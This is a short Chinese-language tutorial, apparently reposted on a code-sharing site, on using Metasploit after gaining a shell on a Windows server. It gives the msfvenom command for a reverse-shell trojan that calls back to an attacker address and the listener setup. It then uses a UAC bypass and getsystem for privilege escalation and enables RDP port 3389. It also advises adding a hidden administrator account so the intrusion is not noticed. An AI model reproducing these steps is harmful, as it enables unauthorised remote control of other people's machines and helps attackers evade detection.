msf開啟3389端口


msf開啟提權及開啟3389端口

背景:

在我們獲取windows服務器反彈shell后,是命令行,如何開啟遠程界面呢?

以下做一下演示:

流程:

1.生成shell木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.128 lport=4444 -f exe>shell.exe 

2.設置監聽

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit 

3.getuid 是普通用戶權限 嘗試getsystem 失敗,利用uac提權

use exploit/windows/local/bypassuac

set session 2

exploit
上線后
getuid
getsystem 提權成功

 

 4.執行 post/windows/manage/enable_tcp 開啟3389端口

run post/windows/manage/enable_tcp  #開啟3389端口

 

 5.運行mstsc

 

 這里有個注意點就是,你這邊遠程登錄后,另一邊的賬戶會被注銷,這樣就會被發現,所有還是自己net user 一個管理員組用戶進行遠程連接

 

 簡單的日志排查

當然你也可以在你的控制面板-系統安全-管理工具-查看時間日志 進行查看日志排查:發現遠程ip登錄過這個主機

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM